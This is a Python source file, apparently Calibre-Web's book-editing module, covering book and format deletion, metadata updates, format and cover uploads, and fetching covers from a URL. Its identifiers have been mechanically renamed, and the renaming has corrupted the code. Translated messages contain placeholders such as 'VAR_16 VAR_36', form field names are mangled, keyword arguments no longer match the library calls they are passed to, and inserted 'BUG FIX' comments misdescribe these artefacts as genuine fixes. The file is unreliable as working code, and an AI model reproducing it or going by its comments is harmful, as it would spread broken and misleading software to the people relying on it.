            VAR_102 = VAR_8(VAR_11, VAR_11)
        elif VAR_4 == 'custom':
            VAR_102 = VAR_8(value=VAR_11)
        elif VAR_4 == 'publisher':
            VAR_102 = VAR_8(VAR_11, None)
        else:  # VAR_4 should be tag or language
            VAR_102 = VAR_8(VAR_11)
        if VAR_10 is None:
            VAR_48 = True
            VAR_6.add(VAR_102)
            VAR_3.append(VAR_102)
        else:
            VAR_10 = FUNC_6(VAR_10, VAR_11, VAR_4)
            VAR_48 = True
            VAR_3.append(VAR_10)
    return VAR_48
def FUNC_6(VAR_10, VAR_11, VAR_4):
    """Synchronise database element VAR_10 with the new value VAR_11.

    'custom' updates value, 'languages' updates lang_code; the remaining
    categories update name plus a category-specific sort field.  Returns the
    (possibly modified) element.
    """
    if VAR_4 == 'custom':
        if VAR_10.value != VAR_11:
            VAR_10.value = VAR_11  # ToDo: Before VAR_102, but this is not plausible
    elif VAR_4 == 'languages':
        if VAR_10.lang_code != VAR_11:
            VAR_10.lang_code = VAR_11
    elif VAR_10.name != VAR_11:
        VAR_10.name = VAR_11
        if VAR_4 == 'series':
            VAR_10.sort = VAR_11
        elif VAR_4 == 'author':
            VAR_10.sort = VAR_11.replace('|', ',')
        elif VAR_4 == 'publisher':
            VAR_10.sort = None
    return VAR_10
def FUNC_7(VAR_5, VAR_3, VAR_8, VAR_6, VAR_4):
    """Reconcile the book relation VAR_3 with the desired name list VAR_5:
    remove stale links (FUNC_4) and add missing ones (FUNC_5).

    Raises TypeError when VAR_5 is not a list.  Returns True when the
    relation changed.
    """
    if not isinstance(VAR_5, list):
        raise TypeError(str(VAR_5) + " should be passed as a list")
    requested = [entry for entry in VAR_5 if entry != '']
    obsolete = FUNC_2(VAR_3, VAR_4, requested)
    missing = FUNC_3(VAR_3, VAR_4, requested)
    changed = FUNC_4(VAR_3, VAR_6, obsolete)
    if len(missing) > 0:
        changed |= FUNC_5(VAR_3, VAR_8, VAR_6, VAR_4, missing)
    return changed
def FUNC_8(VAR_12, VAR_13, VAR_6):
    """Reconcile the book's stored identifiers VAR_13 with the submitted
    identifiers VAR_12 (keyed case-insensitively by type).

    Stored identifiers missing from the input are deleted, matching ones are
    updated in place, and new ones are added to session VAR_6.  Returns
    (changed, warning) where warning flags case-insensitive duplicates in
    the input.
    """
    changed = False
    submitted = {identifier.type.lower(): identifier for identifier in VAR_12}
    # duplicate types (differing only in case) collapse in the dict
    warning = len(VAR_12) != len(submitted)
    stored = {identifier.type.lower(): identifier for identifier in VAR_13}
    for id_type, identifier in stored.items():
        if id_type not in submitted:
            VAR_6.delete(identifier)
            changed = True
        else:
            replacement = submitted[id_type]
            identifier.type = replacement.type
            identifier.val = replacement.val
    for id_type, identifier in submitted.items():
        if id_type not in stored:
            VAR_6.add(identifier)
            changed = True
    return changed, warning
@VAR_0.route("/ajax/delete/<int:VAR_14>")
@login_required
def FUNC_9(VAR_14):
    """AJAX delete: remove book VAR_14 entirely and return the JSON status
    produced by FUNC_13 (jsonResponse=True)."""
    return Response(FUNC_13(VAR_14, "", True), mimetype='application/json')
# BUG FIX: the defaults key must match the view parameter name (VAR_15);
# the stale 'book_format' key made the format-less route fail with a
# missing-argument error.
@VAR_0.route("/delete/<int:VAR_14>", defaults={'VAR_15': ""})
@VAR_0.route("/delete/<int:VAR_14>/<string:VAR_15>")
@login_required
def FUNC_10(VAR_14, VAR_15):
    """Non-AJAX delete: remove book VAR_14 (or only format VAR_15 when
    given) and redirect via FUNC_13."""
    return FUNC_13(VAR_14, VAR_15, False)
def FUNC_11(VAR_14, VAR_16):
    """Delete book VAR_14 from both the app database (shelves, read state,
    downloads) and the calibre database, clearing every relation first."""
    ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_14).delete()
    ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_14).delete()
    ub.delete_download(VAR_14)
    ub.session_commit()
    # passing [u''] clears each relation and garbage-collects orphan rows
    FUNC_7([u''], VAR_16.authors, db.Authors, calibre_db.session, 'author')
    FUNC_7([u''], VAR_16.tags, db.Tags, calibre_db.session, 'tags')
    FUNC_7([u''], VAR_16.series, db.Series, calibre_db.session, 'series')
    FUNC_7([u''], VAR_16.languages, db.Languages, calibre_db.session, 'languages')
    FUNC_7([u''], VAR_16.publishers, db.Publishers, calibre_db.session, 'publishers')
    VAR_52 = calibre_db.session.query(db.Custom_Columns). \
        filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for VAR_28 in VAR_52:
        VAR_30 = "custom_column_" + str(VAR_28.id)
        if not VAR_28.is_multiple:
            if len(getattr(VAR_16, VAR_30)) > 0:
                if VAR_28.datatype == 'bool' or VAR_28.datatype == 'integer' or VAR_28.datatype == 'float':
                    # scalar columns: the row belongs only to this book
                    VAR_105 = getattr(VAR_16, VAR_30)[0]
                    getattr(VAR_16, VAR_30).remove(VAR_105)
                    VAR_1.debug('remove ' + str(VAR_28.id))
                    calibre_db.session.delete(VAR_105)
                    calibre_db.session.commit()
                elif VAR_28.datatype == 'rating':
                    # rating rows may be shared; only delete orphans
                    VAR_105 = getattr(VAR_16, VAR_30)[0]
                    getattr(VAR_16, VAR_30).remove(VAR_105)
                    if len(VAR_105.books) == 0:
                        VAR_1.debug('remove ' + str(VAR_28.id))
                        calibre_db.session.delete(VAR_105)
                        calibre_db.session.commit()
                else:
                    VAR_105 = getattr(VAR_16, VAR_30)[0]
                    getattr(VAR_16, VAR_30).remove(VAR_105)
                    VAR_1.debug('remove ' + str(VAR_28.id))
                    calibre_db.session.delete(VAR_105)
                    calibre_db.session.commit()
        else:
            FUNC_7([u''], getattr(VAR_16, VAR_30), db.cc_classes[VAR_28.id],
                   calibre_db.session, 'custom')
    calibre_db.session.query(db.Books).filter(db.Books.id == VAR_14).delete()
def FUNC_12(VAR_15, VAR_17, VAR_18, VAR_14):
    """Build the success response after deleting book VAR_14 (or just format
    VAR_15).

    VAR_17 selects JSON (AJAX) vs. flash+redirect output; VAR_18 carries an
    optional warning payload produced earlier.
    """
    if VAR_15:
        if VAR_17:
            # BUG FIX: url_for calls used the undefined name `book_id`;
            # the book id parameter is VAR_14.
            return json.dumps([VAR_18, {"location": url_for("editbook.edit_book", VAR_14=VAR_14),
                                        "type": "success",
                                        "format": VAR_15,
                                        "message": _('Book Format Successfully Deleted')}])
        else:
            flash(_('Book Format Successfully Deleted'), category="success")
            return redirect(url_for('editbook.edit_book', VAR_14=VAR_14))
    else:
        if VAR_17:
            return json.dumps([VAR_18, {"location": url_for('web.index'),
                                        "type": "success",
                                        "format": VAR_15,
                                        "message": _('Book Successfully Deleted')}])
        else:
            flash(_('Book Successfully Deleted'), category="success")
            return redirect(url_for('web.index'))
def FUNC_13(VAR_14, VAR_15, VAR_17):
    """Delete book VAR_14, or only its format VAR_15 when non-empty.

    Removes files via helper.delete_book, then the DB rows.  VAR_17 selects
    JSON (AJAX) vs. flash+redirect error reporting; the success response is
    delegated to FUNC_12.
    """
    VAR_18 = {}
    if current_user.role_delete_books():
        VAR_16 = calibre_db.get_book(VAR_14)
        if VAR_16:
            try:
                # BUG FIX: original passed the undefined name `book_format`;
                # the format parameter is VAR_15.
                VAR_68, VAR_49 = helper.delete_book(VAR_16, config.config_calibre_dir, VAR_15=VAR_15.upper())
                if not VAR_68:
                    # BUG FIX (here and below): url_for used the undefined
                    # name `book_id`; the book id is VAR_14.
                    if VAR_17:
                        return json.dumps([{"location": url_for("editbook.edit_book", VAR_14=VAR_14),
                                            "type": "danger",
                                            "format": "",
                                            "message": VAR_49}])
                    else:
                        flash(VAR_49, category="error")
                        return redirect(url_for('editbook.edit_book', VAR_14=VAR_14))
                if VAR_49:
                    # file deletion partially failed: report as a warning
                    if VAR_17:
                        VAR_18 = {"location": url_for("editbook.edit_book", VAR_14=VAR_14),
                                  "type": "warning",
                                  "format": "",
                                  "message": VAR_49}
                    else:
                        flash(VAR_49, category="warning")
                if not VAR_15:
                    FUNC_11(VAR_14, VAR_16)
                else:
                    calibre_db.session.query(db.Data).filter(db.Data.book == VAR_16.id).\
                        filter(db.Data.format == VAR_15).delete()
                calibre_db.session.commit()
            except Exception as ex:
                VAR_1.debug_or_exception(ex)
                calibre_db.session.rollback()
                if VAR_17:
                    return json.dumps([{"location": url_for("editbook.edit_book", VAR_14=VAR_14),
                                        "type": "danger",
                                        "format": "",
                                        "message": ex}])
                else:
                    flash(str(ex), category="error")
                    return redirect(url_for('editbook.edit_book', VAR_14=VAR_14))
        else:
            VAR_1.error('Book with id "%s" could not be deleted: not found', VAR_14)
    return FUNC_12(VAR_15, VAR_17, VAR_18, VAR_14)
def FUNC_14(VAR_14):
    """Render the edit-metadata page for book VAR_14.

    Collects custom columns, author display names and the convertible
    source/target formats, then renders 'book_edit.html'.
    """
    VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    VAR_16 = calibre_db.get_filtered_book(VAR_14, allow_show_archived=True)
    if not VAR_16:
        flash(_(u"Oops! Selected VAR_16 VAR_36 is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    for lang in VAR_16.languages:
        lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
    VAR_16 = calibre_db.order_authors(VAR_16)
    VAR_53 = []
    for VAR_37 in VAR_16.authors:
        VAR_53.append(VAR_37.name.replace('|', ','))
    # Formats the converter can read from / write to for this book.
    VAR_54 = list()
    VAR_55 = list()
    VAR_56 = None
    if config.config_converterpath:
        for file in VAR_16.data:
            if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
                VAR_54.append(file.format.lower())
    if config.config_kepubifypath and 'epub' in [file.format.lower() for file in VAR_16.data]:
        VAR_56 = True
        if not config.config_converterpath:
            VAR_54.append('epub')
    if config.config_converterpath:
        VAR_55 = constants.EXTENSIONS_CONVERT_TO[:]
        for file in VAR_16.data:
            if file.format.lower() in VAR_55:
                # Fix: the original called the undefined name
                # `allowed_conversion_formats`; the target list is VAR_55.
                VAR_55.remove(file.format.lower())
    if VAR_56:
        VAR_55.append('kepub')
    # Fix: the original passed the undefined names `book` and `cc`; the
    # intended values are VAR_16 and VAR_52.
    return render_title_template('book_edit.html', VAR_16=VAR_16, VAR_115=VAR_53, VAR_52=VAR_52,
                                 VAR_36=_(u"edit metadata"), page="editbook",
                                 conversion_formats=VAR_55,
                                 config=config,
                                 source_formats=VAR_54)
def FUNC_15(VAR_19, VAR_16):
    """Apply the submitted rating (form dict VAR_19["rating"]) to book VAR_16.

    Ratings are stored doubled (half-star resolution); an empty field clears
    the rating. Returns True when the stored rating changed.
    """
    VAR_48 = False
    if VAR_19["rating"].strip():
        VAR_84 = False
        if len(VAR_16.ratings) > 0:
            VAR_84 = VAR_16.ratings[0].rating
        VAR_85 = int(float(VAR_19["rating"]) * 2)
        if VAR_85 != VAR_84:
            VAR_48 = True
            # Reuse an existing Ratings row with this value when possible,
            # otherwise create a fresh one.
            VAR_104 = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == VAR_85).first()
            if VAR_104:
                VAR_16.ratings.append(VAR_104)
            else:
                VAR_117 = db.Ratings(rating=VAR_85)
                VAR_16.ratings.append(VAR_117)
            if VAR_84:
                # Remove the old rating only after the new one was appended.
                VAR_16.ratings.remove(VAR_16.ratings[0])
    else:
        if len(VAR_16.ratings) > 0:
            # Empty input clears an existing rating.
            VAR_16.ratings.remove(VAR_16.ratings[0])
            VAR_48 = True
    return VAR_48
def FUNC_16(VAR_20, VAR_16):
    """Apply a comma separated tag string to the book's tag relation."""
    tag_names = helper.uniq([raw.strip() for raw in VAR_20.split(',')])
    return FUNC_7(tag_names, VAR_16.tags, db.Tags, calibre_db.session, 'tags')
def FUNC_17(VAR_21, VAR_16):
    """Apply a single series name (possibly empty) to the book's series relation."""
    series_names = [name for name in [VAR_21.strip()] if name != '']
    return FUNC_7(series_names, VAR_16.series, db.Series, calibre_db.session, 'series')
def FUNC_18(VAR_22, VAR_16):
    """Validate and store the book's series index; return True when it changed.

    Empty input defaults to '1'; non-numeric input is rejected with a warning.
    """
    candidate = VAR_22 or '1'
    # Accept plain integers and decimals containing at most one dot.
    if not candidate.replace('.', '', 1).isdigit():
        flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=candidate), category="warning")
        return False
    if VAR_16.series_index == candidate:
        return False
    VAR_16.series_index = candidate
    return True
def FUNC_19(VAR_23, VAR_16):
    """Update the book's comment/description with sanitized HTML.

    Returns True when the stored comment actually changed.
    """
    VAR_38 = False
    if VAR_23:
        # Fix: the original assigned the cleaned HTML to an unused local
        # (`comments`) and then compared/stored the raw value, so the
        # change-detection compared apples to oranges. Sanitize once and
        # use the sanitized text throughout.
        VAR_23 = clean_html(VAR_23)
    if len(VAR_16.comments):
        if VAR_16.comments[0].text != VAR_23:
            VAR_16.comments[0].text = VAR_23
            VAR_38 = True
    else:
        if VAR_23:
            VAR_16.comments.append(db.Comments(text=VAR_23, VAR_16=VAR_16.id))
            VAR_38 = True
    return VAR_38
def FUNC_20(VAR_24, VAR_16, VAR_25=False, VAR_26=None):
    """Apply a comma separated language string to book VAR_16's languages.

    VAR_25: upload mode -- uses the stricter valid-code lookup and may
            replace a single detected language with the user's filter
            language (see below).
    VAR_26: optional list that collects invalid language names; when it is
            not a list, errors are flashed to the UI instead.
    Returns the FUNC_7 result (truthy when the relation changed).
    """
    VAR_59 = VAR_24.split(',')
    VAR_60 = []
    if not VAR_25:
        VAR_61 = isoLanguages.get_language_codes(get_locale(), VAR_59, VAR_60)
    else:
        VAR_61 = isoLanguages.get_valid_language_codes(get_locale(), VAR_59, VAR_60)
    for l in VAR_60:
        VAR_1.error('%s is not a valid language', l)
        if isinstance(VAR_26, list):
            VAR_26.append(l)
        else:
            flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
    # On upload with exactly one language, override it with the user's
    # language filter unless the filter is "all".
    if VAR_25 and len(VAR_61) == 1:
        if VAR_61[0] != current_user.filter_language() and current_user.filter_language() != "all":
            VAR_61[0] = calibre_db.session.query(db.Languages). \
                filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
    VAR_61 = helper.uniq(VAR_61)
    return FUNC_7(VAR_61, VAR_16.languages, db.Languages, calibre_db.session, 'languages')
def FUNC_21(VAR_27, VAR_16):
    """Synchronise the book's publisher with the submitted value.

    Returns True when the publisher relation was modified.
    """
    if VAR_27:
        cleaned = VAR_27.rstrip().strip()
        # Only touch the relation when the submitted name actually differs.
        if not VAR_16.publishers or cleaned != VAR_16.publishers[0].name:
            return False | FUNC_7([cleaned], VAR_16.publishers, db.Publishers,
                                  calibre_db.session, 'publisher')
        return False
    if len(VAR_16.publishers):
        # Empty input clears an existing publisher.
        return False | FUNC_7([], VAR_16.publishers, db.Publishers, calibre_db.session, 'publisher')
    return False
def FUNC_22(VAR_14, VAR_16, VAR_28, VAR_19, VAR_29, VAR_30):
    """Update a single-valued custom column of type int/bool/float/datetime/comments.

    VAR_28: the Custom_Columns definition; VAR_29: the current stored value
    (or None); VAR_30: the form field name ("custom_column_<id>").
    Normalizes the submitted value in-place in VAR_19, then creates, updates
    or deletes the column row. Returns (changed_flag, VAR_19).
    """
    VAR_48 = False
    # Normalize the raw form string into the column's native type first.
    if VAR_19[VAR_30] == 'None':
        VAR_19[VAR_30] = None
    elif VAR_28.datatype == 'bool':
        VAR_19[VAR_30] = 1 if VAR_19[VAR_30] == 'True' else 0
    elif VAR_28.datatype == 'comments':
        VAR_19[VAR_30] = Markup(VAR_19[VAR_30]).unescape()
        if VAR_19[VAR_30]:
            VAR_19[VAR_30] = clean_html(VAR_19[VAR_30])
    elif VAR_28.datatype == 'datetime':
        try:
            VAR_19[VAR_30] = datetime.strptime(VAR_19[VAR_30], "%Y-%m-%d")
        except ValueError:
            VAR_19[VAR_30] = db.Books.DEFAULT_PUBDATE
    if VAR_19[VAR_30] != VAR_29:
        if VAR_29 is not None:
            if VAR_19[VAR_30] is not None:
                # Overwrite the existing column value in place.
                setattr(getattr(VAR_16, VAR_30)[0], 'value', VAR_19[VAR_30])
                VAR_48 = True
            else:
                # New value is None: drop the existing row entirely.
                VAR_105 = getattr(VAR_16, VAR_30)[0]
                getattr(VAR_16, VAR_30).remove(VAR_105)
                calibre_db.session.delete(VAR_105)
                VAR_48 = True
        else:
            # No previous value: create a new row in the column's table.
            VAR_87 = db.cc_classes[VAR_28.id]
            VAR_88 = VAR_87(value=VAR_19[VAR_30], VAR_16=VAR_14)
            calibre_db.session.add(VAR_88)
            VAR_48 = True
    return VAR_48, VAR_19
def FUNC_23(VAR_16, VAR_28, VAR_19, VAR_29, VAR_30):
    """Update a single-valued custom column that stores shared value rows
    (e.g. text/enumeration/rating columns).

    VAR_28: Custom_Columns definition; VAR_29: current value or None;
    VAR_30: form field name. Returns (changed_flag, VAR_19).
    """
    VAR_48 = False
    if VAR_28.datatype == 'rating':
        # Ratings are stored doubled (half-star resolution).
        VAR_19[VAR_30] = str(int(float(VAR_19[VAR_30]) * 2))
    if VAR_19[VAR_30].strip() != VAR_29:
        if VAR_29 is not None:
            # Detach the old value row; delete it when no book uses it anymore.
            VAR_105 = getattr(VAR_16, VAR_30)[0]
            getattr(VAR_16, VAR_30).remove(VAR_105)
            if len(VAR_105.books) == 0:
                calibre_db.session.delete(VAR_105)
                VAR_48 = True
        VAR_87 = db.cc_classes[VAR_28.id]
        VAR_88 = calibre_db.session.query(VAR_87).filter(
            VAR_87.value == VAR_19[VAR_30].strip()).first()
        if VAR_88 is None:
            # Create the value row, flush so it gets an id, then re-query it.
            VAR_88 = VAR_87(value=VAR_19[VAR_30].strip())
            calibre_db.session.add(VAR_88)
            VAR_48 = True
            calibre_db.session.flush()
            VAR_88 = calibre_db.session.query(VAR_87).filter(
                VAR_87.value == VAR_19[VAR_30].strip()).first()
        getattr(VAR_16, VAR_30).append(VAR_88)
    return VAR_48, VAR_19
def FUNC_24(VAR_14, VAR_16, VAR_19):
    """Apply all custom-column form fields in VAR_19 to book VAR_16.

    Dispatches each column to FUNC_22 (native-typed columns), FUNC_23
    (shared value rows) or FUNC_7 (multi-valued columns). Returns True
    when any column changed.
    """
    VAR_48 = False
    VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for VAR_28 in VAR_52:
        VAR_30 = "custom_column_" + str(VAR_28.id)
        if not VAR_28.is_multiple:
            if len(getattr(VAR_16, VAR_30)) > 0:
                VAR_29 = getattr(VAR_16, VAR_30)[0].value
            else:
                VAR_29 = None
            if VAR_19[VAR_30].strip():
                if VAR_28.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
                    VAR_48, VAR_19 = FUNC_22(VAR_14, VAR_16, VAR_28, VAR_19, VAR_29, VAR_30)
                else:
                    VAR_48, VAR_19 = FUNC_23(VAR_16, VAR_28, VAR_19, VAR_29, VAR_30)
            else:
                # Empty field clears the existing value (and drops the row
                # when no other book references it).
                if VAR_29 is not None:
                    VAR_105 = getattr(VAR_16, VAR_30)[0]
                    getattr(VAR_16, VAR_30).remove(VAR_105)
                    if not VAR_105.books or len(VAR_105.books) == 0:
                        calibre_db.session.delete(VAR_105)
                        VAR_48 = True
        else:
            # Multi-valued column: comma separated values.
            VAR_57 = VAR_19[VAR_30].split(',')
            VAR_57 = list(map(lambda it: it.strip(), VAR_57))
            VAR_48 |= FUNC_7(VAR_57,
                             getattr(VAR_16, VAR_30),
                             db.cc_classes[VAR_28.id],
                             calibre_db.session,
                             'custom')
    return VAR_48
def FUNC_25(VAR_31, VAR_16, VAR_14):
    """Handle the 'add format' file upload on the edit-book page.

    Validates the file extension, writes the file next to the book,
    registers a db.Data row when the format is new, queues a UI task and
    returns the uploader.process() metadata. On failure flashes an error
    and redirects; returns None when no file was submitted.
    """
    if 'btn-VAR_25-format' in VAR_31.files:
        VAR_39 = VAR_31.files['btn-VAR_25-format']
        if VAR_39.filename != '':
            if not current_user.role_upload():
                abort(403)
            if '.' in VAR_39.filename:
                VAR_96 = VAR_39.filename.rsplit('.', 1)[-1].lower()
                if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
                    flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=VAR_96),
                          category="error")
                    return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            else:
                flash(_('File to be uploaded must have an extension'), category="error")
                return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            # Target path: <library>/<book.path>/<basename>.<ext>
            VAR_106 = VAR_16.path.rsplit('/', 1)[-1]
            VAR_107 = os.path.normpath(os.path.join(config.config_calibre_dir, VAR_16.path))
            VAR_108 = os.path.join(VAR_107, VAR_106 + '.' + VAR_96)
            if not os.path.exists(VAR_107):
                try:
                    os.makedirs(VAR_107)
                except OSError:
                    flash(_(u"Failed to create VAR_72 %(path)s (Permission denied).", VAR_72=VAR_107), category="error")
                    return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            try:
                VAR_39.save(VAR_108)
            except OSError:
                flash(_(u"Failed to store file %(file)s.", file=VAR_108), category="error")
                return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            VAR_73 = os.path.getsize(VAR_108)
            VAR_109 = calibre_db.get_book_format(VAR_14, VAR_96.upper())
            if VAR_109:
                # The file on disk was already overwritten above; only the
                # database row is skipped for an existing format.
                VAR_1.warning('Book format %s already existing', VAR_96.upper())
            else:
                try:
                    VAR_119 = db.Data(VAR_14, VAR_96.upper(), VAR_73, VAR_106)
                    calibre_db.session.add(VAR_119)
                    calibre_db.session.commit()
                    calibre_db.update_title_sort(config)
                except (OperationalError, IntegrityError) as e:
                    calibre_db.session.rollback()
                    VAR_1.error('Database VAR_49: %s', e)
                    flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
                    return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            VAR_110=_(u"File format %(ext)s added to %(VAR_16)s", ext=VAR_96.upper(), VAR_16=VAR_16.title)
            WorkerThread.add(current_user.name, TaskUpload(
                "<a href=\"" + url_for('web.show_book', VAR_14=VAR_16.id) + "\">" + VAR_110 + "</a>"))
            return uploader.process(
                VAR_108, *os.path.splitext(VAR_39.filename),
                rarExecutable=config.config_rarfile_location)
def FUNC_26(VAR_31, VAR_16):
    """Handle an uploaded cover image from the edit-book form.

    Returns True on success, False on failure (with a flashed error),
    and None when no cover file was submitted.
    """
    uploaded = VAR_31.files.get('btn-VAR_25-cover')
    if uploaded is None or uploaded.filename == '':
        return None
    if not current_user.role_upload():
        abort(403)
    saved, message = helper.save_cover(uploaded, VAR_16.path)
    if saved is True:
        return True
    flash(message, category="error")
    return False
def FUNC_27(VAR_16, VAR_32):
    """Store a new (stripped) title on the book.

    Empty titles are replaced with the localized 'Unknown'.
    Returns True when the title changed, False otherwise.
    """
    # Fix: the original read the undefined name `book_title`; the
    # submitted title is the VAR_32 parameter.
    VAR_32 = VAR_32.rstrip().strip()
    if VAR_16.title != VAR_32:
        if VAR_32 == '':
            VAR_32 = _(u'Unknown')
        VAR_16.title = VAR_32
        return True
    return False
def FUNC_28(VAR_16, VAR_33, VAR_34=True):
    """Apply an '&'-separated author string to book VAR_16.

    Commas inside a single author name are stored as '|'. When VAR_34 is
    True the book's author_sort is recomputed as well.
    Returns (author_name_list, changed_flag).
    """
    VAR_62 = VAR_33.split('&')
    VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
    VAR_62 = helper.uniq(VAR_62)
    if VAR_62 == ['']:
        VAR_62 = [_(u'Unknown')]  # prevent empty Author
    VAR_63 = FUNC_7(VAR_62, VAR_16.authors, db.Authors, calibre_db.session, 'author')
    VAR_64 = list()
    for inp in VAR_62:
        # Prefer the sort string already stored for a known author.
        VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not VAR_89:
            VAR_89 = helper.get_sorted_author(inp)
        else:
            VAR_89 = VAR_89.sort
        VAR_64.append(helper.get_sorted_author(VAR_89))
    VAR_65 = ' & '.join(VAR_64)
    if VAR_16.author_sort != VAR_65 and VAR_34:
        VAR_16.author_sort = VAR_65
        VAR_63 = True
    return VAR_62, VAR_63
@VAR_0.route("/admin/VAR_16/<int:VAR_14>", methods=['GET', 'POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_29(VAR_14):
    """Edit-book route: GET renders the form, POST applies all submitted
    metadata (title, authors, cover, identifiers, tags, series, publisher,
    languages, rating, custom columns, pubdate) and commits the session.
    """
    VAR_38 = False
    try:
        calibre_db.update_title_sort(config)
    except sqliteOperationalError as e:
        VAR_1.debug_or_exception(e)
        calibre_db.session.rollback()
    if VAR_31.method != 'POST':
        return FUNC_14(VAR_14)
    VAR_16 = calibre_db.get_filtered_book(VAR_14, allow_show_archived=True)
    if not VAR_16:
        flash(_(u"Oops! Selected VAR_16 VAR_36 is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    # Handle an attached format file and an uploaded cover first.
    VAR_35 = FUNC_25(VAR_31, VAR_16, VAR_14)
    if FUNC_26(VAR_31, VAR_16) is True:
        VAR_16.has_cover = 1
        VAR_38 = True
    try:
        VAR_19 = VAR_31.form.to_dict()
        FUNC_30(VAR_19, VAR_35)
        VAR_90 = None
        VAR_91 = FUNC_27(VAR_16, VAR_19["book_title"])
        VAR_62, VAR_92 = FUNC_28(VAR_16, VAR_19["author_name"])
        if VAR_92 or VAR_91:
            # Title or authors changed: remember the id so the on-disk
            # folder structure can be renamed below.
            VAR_90 = VAR_16.id
            VAR_38 = True
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
        VAR_49 = False
        if VAR_90:
            VAR_49 = helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
        if not VAR_49:
            if "cover_url" in VAR_19:
                if VAR_19["cover_url"]:
                    if not current_user.role_upload():
                        return "", (403)
                    if VAR_19["cover_url"].endswith('/static/generic_cover.jpg'):
                        VAR_16.has_cover = 0
                    else:
                        VAR_68, VAR_49 = helper.save_cover_from_url(VAR_19["cover_url"], VAR_16.path)
                        if VAR_68 is True:
                            VAR_16.has_cover = 1
                            VAR_38 = True
                        else:
                            flash(VAR_49, category="error")
            VAR_38 |= FUNC_18(VAR_19["series_index"], VAR_16)
            VAR_38 |= FUNC_19(Markup(VAR_19['description']).unescape(), VAR_16)
            VAR_12 = FUNC_31(VAR_19, VAR_16)
            VAR_112, VAR_18 = FUNC_8(VAR_12, VAR_16.identifiers, calibre_db.session)
            if VAR_18:
                flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
            VAR_38 |= VAR_112
            VAR_38 |= FUNC_16(VAR_19['tags'], VAR_16)
            VAR_38 |= FUNC_17(VAR_19["series"], VAR_16)
            VAR_38 |= FUNC_21(VAR_19['publisher'], VAR_16)
            VAR_38 |= FUNC_20(VAR_19['languages'], VAR_16)
            VAR_38 |= FUNC_15(VAR_19, VAR_16)
            VAR_38 |= FUNC_24(VAR_14, VAR_16, VAR_19)
            if VAR_19["pubdate"]:
                try:
                    VAR_16.pubdate = datetime.strptime(VAR_19["pubdate"], "%Y-%m-%d")
                except ValueError:
                    VAR_16.pubdate = db.Books.DEFAULT_PUBDATE
            else:
                VAR_16.pubdate = db.Books.DEFAULT_PUBDATE
            if VAR_38:
                VAR_16.last_modified = datetime.utcnow()
            calibre_db.session.merge(VAR_16)
            calibre_db.session.commit()
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            if "detail_view" in VAR_19:
                return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
            else:
                flash(_("Metadata successfully updated"), category="success")
                return FUNC_14(VAR_14)
        else:
            # Renaming the book folder failed: roll back all pending changes.
            calibre_db.session.rollback()
            flash(VAR_49, category="error")
            return FUNC_14(VAR_14)
    except Exception as ex:
        VAR_1.debug_or_exception(ex)
        calibre_db.session.rollback()
        flash(_("Error editing VAR_16, please check logfile for details"), category="error")
        return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
def FUNC_30(VAR_19, VAR_35):
    """Fill empty form fields in VAR_19 from the uploaded file's metadata VAR_35."""
    # Treat the localized 'Unknown' placeholder as empty so the file
    # metadata can override it below.
    unknown = _(u'Unknown')
    for placeholder_field in ('author_name', 'book_title'):
        if VAR_19[placeholder_field] == unknown:
            VAR_19[placeholder_field] = ''
    field_map = (
        ('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
        ('series_index', 'series_id'), ('languages', 'languages'),
        ('book_title', 'title'))
    for form_field, meta_field in field_map:
        VAR_19[form_field] = VAR_19[form_field] or getattr(VAR_35, meta_field, '')
    VAR_19["description"] = VAR_19["description"] or Markup(
        getattr(VAR_35, 'description', '')).unescape()
def FUNC_31(VAR_19, VAR_16):
    """Collect db.Identifiers objects from paired 'identifier-type-*' /
    'identifier-val-*' form fields in VAR_19."""
    type_prefix = 'identifier-type-'
    value_prefix = 'identifier-val-'
    collected = []
    for field_name, id_type in VAR_19.items():
        if not field_name.startswith(type_prefix):
            continue
        value_field = value_prefix + field_name[len(type_prefix):]
        # Skip type fields whose matching value field was not submitted.
        if value_field in VAR_19:
            collected.append(db.Identifiers(VAR_19[value_field], id_type, VAR_16.id))
    return collected
def FUNC_32(VAR_36, VAR_37):
    """Prepare authors for an uploaded book with title VAR_36 / authors VAR_37.

    Warns when a book with the same title/author likely exists, ensures the
    first author exists in the database, and returns
    (author_sort_string, author_name_list, first_db_author).
    """
    if VAR_36 != _(u'Unknown') and VAR_37 != _(u'Unknown'):
        VAR_95 = calibre_db.check_exists_book(VAR_37, VAR_36)
        if VAR_95:
            VAR_1.info("Uploaded VAR_16 probably exists in library")
